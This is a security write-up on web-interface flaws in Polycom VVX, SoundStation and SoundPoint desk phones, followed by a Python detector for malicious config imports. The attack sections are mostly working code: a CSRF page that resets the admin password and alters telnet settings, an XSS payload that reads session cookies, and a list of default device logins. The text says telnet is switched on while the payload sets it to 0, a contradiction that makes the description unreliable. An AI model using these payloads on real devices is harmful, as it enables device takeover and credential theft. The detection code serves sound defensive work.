| Field | Value |
| --- | --- |
| Phone Model | VVX 311 |
| Part Number | 3111-48350-001 Rev:A |
| MAC Address | X |
| IP Mode | IPv4 |
| IP Address | X |
| UC Software Version | 5.9.1.0615 |
| Updater Version | 5.9.7.12459 |
This GUI seems to be similar or identical to the SoundPoint's, and most POST requests seem vulnerable to CSRF. I can just take out the cookie login/pass that is in each request and craft a CSRF. For example, the following is a CSRF example that changes the admin password and turns on telnet. This works on the VVX model; however, the same CSRF did not work on the SoundStation and SoundPoint.
<html>
<!-- Polycom VVX 5.9.1.0615 CSRF - Changes Admin pass to 123456. Also turns telnet on, login Polycom/123456 -->
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/192.168.128.11\/form-submit\/Utilities\/configuration\/importFile", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------402251386101268401375671906");
xhr.withCredentials = true;
var body = "-----------------------------402251386101268401375671906\r\n" +
"Content-Disposition: form-data; name=\"myfile\"; filename=\"polycomtelnet.cfg\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3cdevice device.set=\"1\"\x3e\n" +
"\x3cauth device.auth.localAdminPassword.set=\"1\" device.auth.localAdminPassword=\"123456\"/\x3e\n" +
"\x3ctelnet diags.telnetd.enabled=\"0\"\x3e\x3c/telnet\x3e\n" +
"\r\n" +
"-----------------------------402251386101268401375671906--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
This sends a file called polycomtelnet.cfg whose contents are the three lines the script above embeds in the multipart body:
<device device.set="1">
<auth device.auth.localAdminPassword.set="1" device.auth.localAdminPassword="123456"/>
<telnet diags.telnetd.enabled="0"></telnet>
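As a defender-side check added here (not part of the original writeup), the following Python inspects a captured POST to the importFile endpoint: it parses the multipart upload, pulls the parameter="value" pairs out of the cfg file even though the file is not well-formed XML, and raises an alert when the import changes the admin password or toggles telnet, or when the request carries a cross-site Origin header. The sample request is constructed to mirror the PoC above; the Origin value and attacker.example are placeholders.

```python
import re
from email.parser import BytesParser
from email.policy import default as default_policy
from urllib.parse import urlparse
# Settings the PoC above changes via importFile; any import touching them gets an alert.
SENSITIVE_PARAMS = {
    "device.auth.localAdminPassword": "admin password change",
    "diags.telnetd.enabled": "telnet daemon toggle",
}

def parse_multipart_files(content_type, body):
    """Return {filename: bytes} for each file part of a multipart/form-data body."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = BytesParser(policy=default_policy).parsebytes(raw)
    return {p.get_filename(): p.get_payload(decode=True)
            for p in msg.iter_parts() if p.get_filename()}

def sensitive_settings(cfg_text):
    """Keep the sensitive parameter="value" pairs from a phone cfg file. A regex is used
    rather than an XML parser because the PoC file is not well-formed (<device> never closes)."""
    pairs = re.findall(r'([\w.]+)="([^"]*)"', cfg_text)
    return {k: v for k, v in pairs if k in SENSITIVE_PARAMS}

def inspect_import_request(headers, body, phone_host):
    """Alerts for one captured POST to /form-submit/Utilities/configuration/importFile."""
    alerts = []
    origin = headers.get("Origin")
    if origin and urlparse(origin).hostname != phone_host:
        alerts.append(f"cross-origin config import from {origin}")
    ctype = headers.get("Content-Type", "")
    if ctype.startswith("multipart/form-data"):
        for fname, data in parse_multipart_files(ctype, body).items():
            for key, value in sensitive_settings(data.decode("utf-8", "replace")).items():
                alerts.append(f"{fname}: {key}={value} ({SENSITIVE_PARAMS[key]})")
    return alerts

# Constructed sample mirroring the PoC request; Origin is what a browser adds to a cross-site XHR POST (attacker.example is a placeholder).
BOUNDARY = "---------------------------402251386101268401375671906"
SAMPLE_HEADERS = {"Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
                  "Origin": "http://attacker.example"}
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="myfile"; filename="polycomtelnet.cfg"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n"
    '<device device.set="1">\n'
    '<auth device.auth.localAdminPassword.set="1" device.auth.localAdminPassword="123456"/>\n'
    '<telnet diags.telnetd.enabled="0"></telnet>\n'
    f"\r\n--{BOUNDARY}--\r\n"
).encode("ascii")
```

Calling inspect_import_request(SAMPLE_HEADERS, SAMPLE_BODY, "192.168.128.11") returns three alerts: the cross-origin one plus one per sensitive parameter.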
| Field | Value |
| --- | --- |
| Phone Model | SoundStation IP 5000 & SoundPoint IP 335 (same firmware) |
| Part Number | 3111-30900-001 Rev:H |
| MAC Address | X |
| IP Address | X |
| UC Software Version | 4.0.14.1388 |
| BootROM Software Version | 5.0.14.0580 |
This is a POST XSS via CSRF that the newest firmware of both the SoundStation and the SoundPoint is vulnerable to. Given the simple Cookie: Authorization= header, having the cookie exposed makes the credentials easy to recover, since the value only needs to be decoded from base64.
<html>
<!-- Post XSS via CSRF on Soundstation IP 5000 & SoundPoint IP 335 UC ver 4.0.14.1388 -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.128.17/form-submit" method="POST">
<input type="hidden" name="250:1" value=""><Script>alert(document.cookie)</Script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Most of these devices come with default logins: user/123 and admin/456. However, if the company setting them up has changed those, these CSRF vulnerabilities could be useful.